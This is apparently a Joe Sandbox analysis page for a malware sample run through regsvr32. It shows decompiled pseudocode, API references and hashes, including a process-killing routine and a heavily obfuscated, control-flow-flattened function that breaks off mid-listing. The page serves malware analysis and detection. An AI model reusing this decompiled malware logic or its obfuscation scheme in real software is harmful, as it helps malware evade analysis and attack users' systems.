Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocH_prolog
String ID:
API String ID: 3910492588-0
Opcode ID: e7b0fb009e732440d7f1ad1dadbdc5c11312b5a2a351de4b687d320f66e89e2b
Instruction ID: 2d4efd59785827692598295cd274691eeff327a1802b919cb3bc61650911ffe3
Opcode Fuzzy Hash: e7b0fb009e732440d7f1ad1dadbdc5c11312b5a2a351de4b687d320f66e89e2b
Instruction Fuzzy Hash: E701AD39601141DFD72ADF65E80176D76A2FB84252F50012DF8818B391DF749E00CB10

Uniqueness

Uniqueness Score: -1.00%

Function 04F808C3 Relevance: 1.5, APIs: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04F808C3() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _t32;
				void* _t33;

				_v20 = 0xba35d;
				_v16 = 0x2c63f;
				_v8 = 0x18668b;
				_v8 = _v8 << 7;
				_v8 = _v8 * 0x77;
				_v8 = _v8 + 0xffff88d8;
				_v8 = _v8 ^ 0xabd92865;
				_v12 = 0xa923ab;
				_v12 = _v12 + 0xffffe870;
				_v12 = _v12 ^ 0x2e66d6cd;
				_v12 = _v12 ^ 0x2eca4b61;
				_v16 = 0xa7f2df;
				_v16 = _v16 + 0xffff74c1;
				_v16 = _v16 ^ 0x00a03459;
				E04F652F2(_t32, _t33, _t32, 0xc1, 0x82522eb8, 0x9f49d153);
				ExitProcess(0);
			}

0x04f808c9
0x04f808d0
0x04f808d7
0x04f808de
0x04f808f6
0x04f808f9
0x04f80900
0x04f80907
0x04f8090e
0x04f80915
0x04f8091c
0x04f80923
0x04f8092a
0x04f80931
0x04f80941
0x04f8094b

APIs

ExitProcess.KERNEL32(00000000), ref: 04F8094B

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 1d89245fcaf8bc8bfc49024291ef06cfa865d6d529eb9dfc713b0c2537c2a249
Instruction ID: 51e223e25e73cceb2ab7fb70d1ac46e3759bf5e4a899f5cd9f025f342a92d176
Opcode Fuzzy Hash: 1d89245fcaf8bc8bfc49024291ef06cfa865d6d529eb9dfc713b0c2537c2a249
Instruction Fuzzy Hash: 150100B1D4130CFBDB44DFE9E98A98DBBB0EB10714F2081899825B7290D3B85B549F44

Uniqueness

Uniqueness Score: -1.00%

Function 10003EB0 Relevance: 1.3, APIs: 1, Instructions: 10
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10003EB0(void* _a4, long _a8, long _a12, long _a16) {
				void* _t7;

				_t7 = VirtualAlloc(_a4, _a8, _a12, _a16); // executed
				return _t7;
			}

0x10003ec4
0x10003eca

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 10003EC4

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 15b89824363f171e64d021769587ec405e143ae0d2096a53b22888187e350f18
Instruction ID: cc11b4e98ac1f6dbf9c6c41e4826b94b26534509fc882ebdeb3bfc844180388a
Opcode Fuzzy Hash: 15b89824363f171e64d021769587ec405e143ae0d2096a53b22888187e350f18
Instruction Fuzzy Hash: 49C002B9608301BFDA04CB54C898D6BB7EDEBC8340F00894CF699C3210C770E841CB62

Uniqueness

Uniqueness Score: -1.00%

Function 10003ED0 Relevance: 1.3, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10003ED0(void* _a4, long _a8, long _a12) {
				int _t5;

				_t5 = VirtualFree(_a4, _a8, _a12); // executed
				return _t5;
			}

0x10003edf
0x10003ee5

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 10003EDF

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4a008d87dccae8804d9abd27eac3f0a4c8d83060a253e3a0d4fa13a2ed21b652
Instruction ID: 0814384d662f6d192d51ff160704c728768ee215607d74ccaf3f6caab97fdcf1
Opcode Fuzzy Hash: 4a008d87dccae8804d9abd27eac3f0a4c8d83060a253e3a0d4fa13a2ed21b652
Instruction Fuzzy Hash: 6EC048B8208300BFEA04CB10C989C2BB7A9EBC8610F00C94CB88A83210C630EC01DB22

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 10006650 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 159
windowsleepprocessCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E10006650(void* __ecx) {
				void* __ebp;
				void* _t31;
				int _t38;
				intOrPtr* _t44;
				intOrPtr* _t46;
				signed int _t58;
				signed int _t59;
				signed int _t67;
				signed int _t74;
				signed int _t78;
				void* _t84;
				intOrPtr* _t87;
				void* _t88;
				int _t89;
				void* _t90;

				_t84 = __ecx;
				 *(_t90 + 0x1c) = 0x128;
				_t31 = CreateToolhelp32Snapshot(0xf, 0);
				 *(_t84 + 0x74) = _t31;
				 *(_t84 + 0x77c) = Process32First(_t31, _t90 + 0x14);
				do {
					E10011245(_t84 + 0x178, "%08X",  *(_t90 + 0x1c));
					_t90 = _t90 + 0xc;
					_t89 = 0;
					if(SendMessageA( *(_t84 + 0x9cc), 0x1004, 0, 0) > 0) {
						do {
							if(SendMessageA( *(_t84 + 0x9cc), 0x102c, _t89, 2) == 2) {
								_push(1);
								_push(_t89);
								_push(_t90 + 0x18);
								_t44 =  *((intOrPtr*)(E1001D60B(_t84 + 0x9b0)));
								_t87 = _t84 + 0x178;
								while(1) {
									_t78 =  *_t44;
									_t58 =  *_t87;
									_t67 = _t78;
									if(_t78 != _t58) {
										break;
									}
									if(_t67 == 0) {
										L9:
										_t44 = 0;
										L11:
										_t59 = _t58 & 0xffffff00 | _t44 == 0x00000000;
										_t46 =  *((intOrPtr*)(_t90 + 0x10)) + 0xfffffff0;
										asm("lock xadd [ecx], edx");
										if((_t78 | 0xffffffff) - 1 <= 0) {
											 *((intOrPtr*)( *((intOrPtr*)( *_t46)) + 4))(_t46);
										}
										if(_t59 != 0) {
											E10011245(_t90 + 0x140, "Are You want to terminate\n%s", _t90 + 0x38);
											_t90 = _t90 + 0xc;
											if(E1002027F(_t84, _t90 + 0x144, 0, 4) == 6) {
												_t88 = OpenProcess(0x100001, 0,  *(_t90 + 0x1c));
												if(TerminateProcess(_t88, 0) != 0) {
													CloseHandle(_t88);
												} else {
													E10011245(_t90 + 0x140, "Failed to terminate\n%s", _t90 + 0x38);
													_t90 = _t90 + 0xc;
													E1002027F(_t84, _t90 + 0x144, 0, 0);
												}
											}
										}
										goto L18;
									}
									_t78 =  *((intOrPtr*)(_t44 + 1));
									_t58 =  *((intOrPtr*)(_t87 + 1));
									_t74 = _t78;
									if(_t78 != _t58) {
										break;
									}
									_t44 = _t44 + 2;
									_t87 = _t87 + 2;
									if(_t74 != 0) {
										continue;
									}
									goto L9;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								goto L11;
							}
							L18:
							_t89 = _t89 + 1;
						} while (_t89 < SendMessageA( *(_t84 + 0x9cc), 0x1004, 0, 0));
					}
					_t38 = Process32Next( *(_t84 + 0x74), _t90 + 0x14);
					 *(_t84 + 0x77c) = _t38;
				} while (_t38 != 0);
				CloseHandle( *(_t84 + 0x74));
				Sleep(0x1f4);
				return E10005C90(_t84);
			}

0x1000665e
0x10006660
0x10006668
0x10006673
0x1000667b
0x10006681
0x10006692
0x100066a3
0x100066a6
0x100066b4
0x100066c0
0x100066d4
0x100066da
0x100066dc
0x100066e1
0x100066ed
0x100066ef
0x100066f5
0x100066f5
0x100066f7
0x100066f9
0x100066fd
0x00000000
0x00000000
0x10006701
0x10006719
0x10006719
0x10006722
0x10006728
0x1000672b
0x10006734
0x1000673b
0x10006742
0x10006742
0x10006747
0x1000675f
0x10006764
0x1000677d
0x10006791
0x1000679e
0x100067d0
0x100067a0
0x100067b2
0x100067b7
0x100067c8
0x100067c8
0x1000679e
0x1000677d
0x00000000
0x10006747
0x10006703
0x10006706
0x10006709
0x1000670d
0x00000000
0x00000000
0x1000670f
0x10006712
0x10006717
0x00000000
0x00000000
0x00000000
0x10006717
0x1000671d
0x1000671f
0x00000000
0x1000671f
0x100067d6
0x100067ec
0x100067ef
0x100066c0
0x10006800
0x10006807
0x10006807
0x10006817
0x10006822
0x10006839

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 10006668
Process32First.KERNEL32(00000000,00000000), ref: 10006676
SendMessageA.USER32 ref: 100066B0
SendMessageA.USER32 ref: 100066CF
SendMessageA.USER32 ref: 100067ED

Part of subcall function 1001D60B: __EH_prolog.LIBCMT ref: 1001D610
Part of subcall function 1001D60B: SendMessageA.USER32 ref: 1001D670

OpenProcess.KERNEL32(00100001,00000000,?,?,00000000,00000004,?,00000000,00000001), ref: 1000678B
TerminateProcess.KERNEL32(00000000,00000000), ref: 10006796
CloseHandle.KERNEL32(00000000), ref: 100067D0
Process32Next.KERNEL32 ref: 10006800
CloseHandle.KERNEL32(?,?,?), ref: 10006817
Sleep.KERNEL32(000001F4), ref: 10006822

Strings

Are You want to terminate%s, xrefs: 10006759
%08X, xrefs: 1000668C
Failed to terminate%s, xrefs: 100067AC

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$CloseHandleProcessProcess32$CreateFirstH_prologNextOpenSleepSnapshotTerminateToolhelp32
String ID: %08X$Are You want to terminate%s$Failed to terminate%s
API String ID: 2677561046-3360442637
Opcode ID: ddf8eb443103b2f02dc7b0564349c69ce226a1a7f92cd43cff0101d72a6388b3
Instruction ID: 26037f420bde038a9de5e87ed646fa7b37689810b46713e8eead2fc80cc2110d
Opcode Fuzzy Hash: ddf8eb443103b2f02dc7b0564349c69ce226a1a7f92cd43cff0101d72a6388b3
Instruction Fuzzy Hash: 8B512871644702AFE310DF74CC85FEB7BAAEF89394F104618F6598B191EB71B4098B90

Uniqueness

Uniqueness Score: -1.00%

Function 04F7A0F3 Relevance: 17.0, Strings: 13, Instructions: 787
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E04F7A0F3(intOrPtr __ecx) {
				char _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char* _v60;
				signed int _v64;
				char _v68;
				intOrPtr _v72;
				signed int _v76;
				char _v80;
				intOrPtr _v84;
				char _v88;
				char _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				void* _t869;
				void* _t876;
				intOrPtr _t891;
				intOrPtr _t893;
				intOrPtr _t894;
				signed int _t895;
				void* _t901;
				signed int _t906;
				intOrPtr _t914;
				intOrPtr _t916;
				void* _t921;
				void* _t929;
				signed int _t940;
				intOrPtr _t956;
				void* _t963;
				void* _t969;
				void* _t984;
				void* _t990;
				signed int _t992;
				signed int _t994;
				signed int _t995;
				signed int _t996;
				signed int _t997;
				signed int _t999;
				signed int _t1002;
				signed int _t1004;
				signed int _t1009;
				signed int _t1010;
				signed int _t1012;
				signed int _t1013;
				signed int _t1016;
				signed int _t1018;
				signed int _t1019;
				signed int _t1021;
				signed int _t1023;
				signed int _t1024;
				signed int _t1025;
				signed int _t1027;
				signed int _t1028;
				signed int _t1030;
				signed int _t1031;
				signed int _t1034;
				signed int _t1035;
				void* _t1037;
				intOrPtr _t1056;
				intOrPtr _t1084;
				void* _t1107;
				intOrPtr _t1108;
				void* _t1110;
				void* _t1115;
				signed int* _t1117;
				void* _t1123;

				_t1117 =  &_v128;
				_v56 = 0x9f8a3;
				_t1115 = 0;
				_v52 = 0x16164;
				_t984 = 0x3ca90;
				_v84 = __ecx;
				_t1107 = 0xa663c;
				_v48 = 0x669c9;
				_t1110 = 0xf1419;
				while(1) {
					L1:
					_t1037 = 0xfa89e;
					_t869 = 0x457da;
					_t990 = 0x44242;
					do {
						while(1) {
							L2:
							_t1123 = _t984 - 0x5cfd6;
							if(_t1123 > 0) {
								break;
							}
							if(_t1123 == 0) {
								_v124 = 0xb71f6c;
								_v124 = _v124 | 0x552938c4;
								_t1004 = 0x43;
								_v124 = _v124 * 0x14;
								_v124 = _v124 / _t1004;
								_v124 = _v124 ^ 0x02a4dff2;
								_v120 = 0x9528f0;
								_v120 = _v120 + 0xffff9a6c;
								_v120 = _v120 * 0xf;
								_v120 = _v120 ^ 0x0520ac81;
								_v120 = _v120 ^ 0x0d9cc017;
								_v116 = 0x4bff9a;
								_v116 = _v116 + 0x590d;
								_v116 = _v116 ^ 0x1349125b;
								_v116 = _v116 ^ 0x803e7284;
								_v116 = _v116 ^ 0x933a54dd;
								_t914 =  *0x4f8220c; // 0x0
								E04F7E4B2(_v124, _v120, __eflags, _v116,  *((intOrPtr*)(_t914 + 0x74)));
								_t984 = _t1107;
								goto L1;
							} else {
								if(_t984 == 0x3ca90) {
									_t984 = 0x53967;
									continue;
								} else {
									if(_t984 == _t990) {
										_v108 = 0x84cb9a;
										_v108 = _v108 << 6;
										_v108 = _v108 ^ 0x213e408b;
										_v120 = 0x4f1108;
										_v120 = _v120 + 0x747c;
										_v120 = _v120 + 0x494b;
										_v120 = _v120 + 0xffff8f1d;
										_v120 = _v120 ^ 0x004f7356;
										_v116 = 0xac057d;
										_v116 = _v116 << 5;
										_v116 = _v116 + 0xfd75;
										_v116 = _v116 >> 0xc;
										_v116 = _v116 ^ 0x0008d7a9;
										_v104 = 0x4ef965;
										_v104 = _v104 + 0xffffde81;
										_v104 = _v104 ^ 0x0049ae7c;
										_t916 = E04F7D6A7(_v108, _v120, _v116, 0x4f61718, _v104);
										_v108 = 0xbe8d65;
										_t1108 = _t916;
										_v108 = _v108 << 0x10;
										_v108 = _v108 | 0x95ae3608;
										_v108 = _v108 ^ 0x9de70f0d;
										_v116 = 0xf57a7c;
										_v116 = _v116 + 0xffffd69b;
										_t1009 = 0x1d;
										_v116 = _v116 / _t1009;
										_v116 = _v116 ^ 0x3320d2ee;
										_v116 = _v116 ^ 0x33287d1f;
										_v112 = 0xc3390c;
										_t1010 = 0x6a;
										_v112 = _v112 / _t1010;
										_v112 = _v112 ^ 0x00030e37;
										_v104 = 0x69650f;
										_v104 = _v104 + 0xffff9cf7;
										_v104 = _v104 ^ 0x006ffd4f;
										_t921 = E04F7D6A7(_v108, _v116, _v112, 0x4f61788, _v104);
										_v108 = 0x4fc617;
										_v108 = _v108 + 0xffff7c8c;
										_v108 = _v108 << 4;
										_v108 = _v108 ^ 0x04f42a30;
										_v76 = _v108;
										_v128 = 0xd9fcb1;
										_v128 = _v128 | 0xfca3ff83;
										_v128 = _v128 >> 0xd;
										_v128 = _v128 << 7;
										_v128 = _v128 ^ 0x03f3ef81;
										_v124 = 0x9c149a;
										_v124 = _v124 << 8;
										_v124 = _v124 << 1;
										_v124 = _v124 << 4;
										_v124 = _v124 ^ 0x8296d575;
										_v108 = 0x2670eb;
										_v108 = _v108 + 0x7e26;
										_v108 = _v108 * 0x5f;
										_v108 = _v108 ^ 0x0e72f9ff;
										_v120 = 0xd9d280;
										_v120 = _v120 << 0xb;
										_v120 = _v120 * 0x47;
										_v120 = _v120 | 0x5cc301fd;
										_v120 = _v120 ^ 0x5fc251fc;
										_v116 = 0xf6ddb7;
										_t1012 = 0x44;
										_v116 = _v116 / _t1012;
										_t1013 = 0x35;
										_v116 = _v116 / _t1013;
										_v116 = _v116 ^ 0x8fa00b1b;
										_v116 = _v116 ^ 0x8fa9ab8a;
										_t929 = E04F7E40B(_v124, _v108, _v120, _t1108, _v116);
										_v72 = _t1108;
										_v80 = _t929 + _v128 + _t929 + _v128;
										_v108 = 0xea8c40;
										_v108 = _v108 | 0x9ff47cdf;
										_v108 = _v108 ^ 0x9ffefcdf;
										_v68 = _v108;
										_v108 = 0x189253;
										_v108 = _v108 * 0x7c;
										_v108 = _v108 + 0x378a;
										_v108 = _v108 ^ 0x0be717bf;
										_v64 = _v108;
										_v60 =  &_v80;
										_v116 = 0x249a0b;
										_v116 = _v116 | 0x384e9d73;
										_v116 = _v116 ^ 0x7671c486;
										_v116 = _v116 + 0xffffb44c;
										_v116 = _v116 ^ 0x4e1f1069;
										_v92 = _v116;
										_v124 = 0x690e26;
										_v124 = _v124 >> 0x10;
										_v124 = _v124 + 0xffffaf22;
										_v124 = _v124 | 0xf5af4be1;
										_v124 = _v124 ^ 0xfff0feaa;
										_v120 = 0xaf79e1;
										_v120 = _v120 << 1;
										_v120 = _v120 ^ 0x26d2392d;
										_v120 = _v120 >> 4;
										_v120 = _v120 ^ 0x027989b1;
										_v116 = 0x8f4bfd;
										_v116 = _v116 << 0xd;
										_v116 = _v116 << 0xd;
										_v116 = _v116 | 0xede2dc82;
										_v116 = _v116 ^ 0xfdeb29cd;
										_v112 = 0xb8ec54;
										_v112 = _v112 * 0xf;
										_v112 = _v112 ^ 0x0ade58c5;
										_v104 = 0xe92162;
										_v104 = _v104 << 3;
										_v104 = _v104 ^ 0x074d0178;
										_v108 = 0x7f71e9;
										_v108 = _v108 | 0x08574e63;
										_v108 = _v108 ^ 0x1f77721e;
										_v108 = _v108 ^ 0x17050906;
										_t940 = E04F699DE( &_v68, _v124, _v120,  &_v32, _v116,  &_v92, _v112, _v124, _v84, _v104, _v108, _v92, _t921);
										_v112 = 0x98960d;
										__eflags = _t940;
										_t984 =  ==  ? 0xfa89e : 0xa663c;
										_v112 = _v112 + 0x2abf;
										_v112 = _v112 ^ 0x009b6296;
										_v108 = 0x1aa7a6;
										_v108 = _v108 >> 0xf;
										_v108 = _v108 ^ 0x000a7a1b;
										_v104 = 0x7565b4;
										_t1016 = 0x3f;
										_v104 = _v104 / _t1016;
										_v104 = _v104 ^ 0x000660c4;
										_v116 = 0x6fd4c8;
										_v116 = _v116 + 0x97bc;
										_v116 = _v116 * 0x70;
										_v116 = _v116 ^ 0x6ce2f187;
										_v116 = _v116 ^ 0x5dce4d78;
										E04F6845B(_v112, _v108, _v104, _v116, _t1108);
										_v116 = 0x9dda21;
										_v116 = _v116 + 0xe97d;
										_v116 = _v116 + 0xac83;
										_v116 = _v116 ^ 0x009aba74;
										_v112 = 0xe4accc;
										_v112 = _v112 + 0xffff18b3;
										_t1018 = 0x3b;
										_v112 = _v112 / _t1018;
										_v112 = _v112 ^ 0x00045fdb;
										_v104 = 0x47abe2;
										_t1019 = 0x5e;
										_v104 = _v104 / _t1019;
										_v104 = _v104 ^ 0x000e6d73;
										_v108 = 0x8dfaea;
										_v108 = _v108 << 2;
										_v108 = _v108 ^ 0x55133bb5;
										_v108 = _v108 ^ 0x57238376;
										E04F6845B(_v116, _v112, _v104, _v108, _t921);
										_t1117 =  &(_t1117[0x1a]);
										goto L9;
									} else {
										if(_t984 == _t869) {
											_v112 = 0xd87e76;
											_t1021 = 0x2c;
											_push(_t1021);
											_v112 = _v112 / _t1021;
											_v112 = _v112 + 0xffff091d;
											_v112 = _v112 ^ 0x0006e80c;
											_v108 = 0xa7d7e0;
											_v108 = _v108 + 0x5d66;
											_v108 = _v108 | 0xcaa9b352;
											_v108 = _v108 ^ 0xcaa6866a;
											_t1084 =  *0x4f8220c; // 0x0
											_t1023 = E04F73EE6(_t1021,  *((intOrPtr*)(_t1084 + 0x78)), __eflags);
											_t956 =  *0x4f8220c; // 0x0
											__eflags = _t1023;
											_t984 =  !=  ? _t1110 : _t1107;
											 *(_t956 + 0x74) = _t1023;
											while(1) {
												L1:
												_t1037 = 0xfa89e;
												_t869 = 0x457da;
												_t990 = 0x44242;
												goto L2;
											}
										} else {
											if(_t984 == 0x53967) {
												_v124 = 0x88d1a8;
												_t1024 = 0x1b;
												_v124 = _v124 * 0x1d;
												_v124 = _v124 >> 4;
												_v124 = _v124 * 0x5c;
												_v124 = _v124 ^ 0x5917c468;
												_v104 = 0x63d41f;
												_v104 = _v104 | 0xd9d3095e;
												_v104 = _v104 ^ 0xd9f2a719;
												_v108 = 0x9ea87d;
												_v108 = _v108 << 7;
												_v108 = _v108 << 1;
												_v108 = _v108 ^ 0x9ea0f699;
												_v128 = 0x69ff43;
												_v128 = _v128 + 0xffff4840;
												_t1025 = 0x3b;
												_v128 = _v128 / _t1024;
												_v128 = _v128 / _t1025;
												_v128 = _v128 ^ 0x000c3b00;
												_t963 = E04F7D6A7(_v124, _v104, _v108, 0x4f61768, _v128);
												_v112 = 0xffa912;
												_v112 = _v112 | 0x7d902c07;
												_v112 = _v112 ^ 0x7df5cde1;
												_v124 = 0xcf82a3;
												_t1027 = 0x5b;
												_v124 = _v124 * 0x5c;
												_t1028 = 0x55;
												_v124 = _v124 / _t1027;
												_v124 = _v124 << 0x10;
												_v124 = _v124 ^ 0xca67bf51;
												_v108 = 0xc1604f;
												_v108 = _v108 ^ 0x8da37d34;
												_v108 = _v108 ^ 0x8d6c1d35;
												_v104 = 0xdb6841;
												_v104 = _v104 / _t1028;
												_v104 = _v104 ^ 0x0001d84d;
												_t969 = E04F7D6A7(_v112, _v124, _v108, 0x4f61678, _v104);
												_v116 = 0xe8a17d;
												_v116 = _v116 + 0xffff6185;
												_v116 = _v116 * 0x63;
												_v116 = _v116 ^ 0xa9356697;
												_v116 = _v116 ^ 0xf082f18e;
												_v120 = 0xd6f80b;
												_v120 = _v120 << 0xc;
												_v120 = _v120 * 6;
												_t1030 = 0x26;
												_v120 = _v120 / _t1030;
												_v120 = _v120 ^ 0x042a9b8e;
												_v128 = 0xb59cfd;
												_t1031 = 0x66;
												_v128 = _v128 / _t1031;
												_v128 = _v128 | 0x8b7428d7;
												_v128 = _v128 << 0xa;
												_v128 = _v128 ^ 0xd7bc37a8;
												_v124 = 0xbe877d;
												_v124 = _v124 | 0xa7f97cbf;
												_v124 = _v124 >> 1;
												_v124 = _v124 ^ 0x53f93098;
												E04F62D6F( &_v88, _v116, _v120, _v128, _t963, _t1031, _v124, _t969);
												_v112 = 0xfa4f8a;
												_t984 =  ==  ? 0x44242 : 0xdce1d;
												_v112 = _v112 >> 5;
												_v112 = _v112 ^ 0x911999e0;
												_v112 = _v112 ^ 0x9115cff1;
												_v116 = 0x6db5e2;
												_v116 = _v116 >> 0xc;
												_v116 = _v116 ^ 0x00018dc7;
												_v104 = 0xbe3b1d;
												_v104 = _v104 | 0x915eb58e;
												_v104 = _v104 ^ 0x91f70bf0;
												_v108 = 0x571053;
												_v108 = _v108 | 0x80d4f132;
												_v108 = _v108 + 0xffff8f73;
												_v108 = _v108 ^ 0x80db82d4;
												E04F6845B(_v112, _v116, _v104, _v108, _t963);
												_v112 = 0xf496c1;
												_v112 = _v112 ^ 0x24010733;
												_v112 = _v112 ^ 0x24f73bcc;
												_v116 = 0xf11abd;
												_t1034 = 0x54;
												_v116 = _v116 / _t1034;
												_t1035 = 0x31;
												_v116 = _v116 / _t1035;
												_v116 = _v116 >> 0xb;
												_v116 = _v116 ^ 0x00050a96;
												_v108 = 0x8062ec;
												_v108 = _v108 >> 5;
												_v108 = _v108 ^ 0x0005e74b;
												_v104 = 0x17f63a;
												_v104 = _v104 | 0xd3f2e710;
												_v104 = _v104 ^ 0xd3f62d8f;
												E04F6845B(_v112, _v116, _v108, _v104, _t969);
												_t1117 =  &(_t1117[0x12]);
												L9:
												_t1107 = 0xa663c;
												L10:
												_t1110 = 0xf1419;
												L25:
												_t869 = 0x457da;
												_t990 = 0x44242;
												_t1037 = 0xfa89e;
											}
										}
									}
								}
							}
							goto L26;
						}
						__eflags = _t984 - _t1107;
						if(_t984 == _t1107) {
							_v108 = 0x6f8e0;
							_v108 = _v108 + 0x7de;
							_v108 = _v108 * 0x3a;
							_v108 = _v108 << 0xd;
							_v108 = _v108 ^ 0xc568344f;
							_v100 = 0xc94bc8;
							_v100 = _v100 >> 5;
							_v100 = _v100 ^ 0x00096101;
							_v96 = 0x266352;
							_v96 = _v96 << 1;
							_t863 =  &_v96;
							 *_t863 = _v96 ^ 0x004f6080;
							__eflags =  *_t863;
							E04F75C41(_v108, _v88, _v100, _v96);
							_t984 = 0xdce1d;
							goto L24;
						} else {
							__eflags = _t984 - _t1110;
							if(_t984 == _t1110) {
								_v112 = 0x24d03;
								_t992 = 0x54;
								_v112 = _v112 * 0xe;
								_v112 = _v112 ^ 0x002901ad;
								_v104 = 0xef4c18;
								_v104 = _v104 >> 9;
								_v104 = _v104 ^ 0x000f46c1;
								_v116 = 0x2008dc;
								_v116 = _v116 / _t992;
								_v116 = _v116 | 0xc20791fb;
								_v116 = _v116 ^ 0x814a9b82;
								_v116 = _v116 ^ 0x43465652;
								_v108 = 0x3f208f;
								_v108 = _v108 * 0x28;
								_v108 = _v108 + 0xae98;
								_v108 = _v108 ^ 0x09d6e1f2;
								_t876 = E04F7D6A7(_v112, _v104, _v116, 0x4f617f8, _v108);
								_v104 = 0x949c15;
								_t1112 = _t876;
								_v104 = _v104 | 0x66cf7364;
								_v104 = _v104 ^ 0x2b9dbb3e;
								_v44 = _v104;
								_v104 = 0x551589;
								_v104 = _v104 + 0xa713;
								_v104 = _v104 ^ 0x0055bc9d;
								_v40 = _v104;
								_v116 = 0xdcf78f;
								_v116 = _v116 + 0xdc46;
								_v116 = _v116 << 5;
								_v116 = _v116 << 1;
								_v116 = _v116 ^ 0x3774f560;
								_v36 = _v116;
								_v108 = 0x34f278;
								_v108 = _v108 >> 9;
								_v108 = _v108 | 0x7cab1057;
								_v108 = _v108 << 0x10;
								_v108 = _v108 ^ 0x1a71eb89;
								_v96 = 0x221b30;
								_v96 = _v96 + 0xa402;
								_v96 = _v96 ^ 0x002acc20;
								_v112 = 0x25e8e5;
								_v112 = _v112 | 0x8948e3ce;
								_v112 = _v112 >> 3;
								_v112 = _v112 ^ 0x5244dd44;
								_v112 = _v112 ^ 0x436df251;
								_v104 = 0x903417;
								_t994 = 0x4d;
								_v104 = _v104 / _t994;
								_v104 = _v104 + 0xffff0121;
								_v104 = _v104 ^ 0x0003a2fc;
								_v128 = 0xebad69;
								_t995 = 0x60;
								_v128 = _v128 * 0xc;
								_v128 = _v128 * 0x63;
								_v128 = _v128 / _t995;
								_v128 = _v128 ^ 0x00b74a54;
								_v124 = 0x6b15d0;
								_v124 = _v124 ^ 0x373febd3;
								_v124 = _v124 + 0x1583;
								_t996 = 0xd;
								_v124 = _v124 / _t996;
								_v124 = _v124 ^ 0x044ca244;
								_v120 = 0x3a45b7;
								_v120 = _v120 << 0xd;
								_v120 = _v120 | 0xaf22947b;
								_v120 = _v120 >> 0xc;
								_v120 = _v120 ^ 0x00086810;
								_v116 = 0x1cee37;
								_v116 = _v116 + 0x9328;
								_v116 = _v116 + 0x5aac;
								_t997 = 0x32;
								_v116 = _v116 / _t997;
								_v116 = _v116 ^ 0x000e284a;
								_v100 = 0xb29d75;
								_v100 = _v100 | 0xc9f13138;
								_v100 = _v100 ^ 0xc9f2a3dc;
								_t891 =  *0x4f8220c; // 0x0
								_t893 =  *0x4f8220c; // 0x0
								_t894 =  *0x4f8220c; // 0x0
								_t895 = E04F799DC(_v108, _v96,  *((intOrPtr*)(_t894 + 0x78)), _v112, _v104, _v128, _t876, _t997,  *((intOrPtr*)(_t893 + 0x74)), _v124, _v120, _t891 + 0x60, _v88, _t997,  &_v44, _v116, _t997, _v100);
								_t1117 =  &(_t1117[0x13]);
								__eflags = _t895;
								if(_t895 != 0) {
									_t984 = 0x5cfd6;
								} else {
									_t984 = _t1107;
									_t1115 = 1;
								}
								_v96 = 0x34c15;
								_t999 = 0x52;
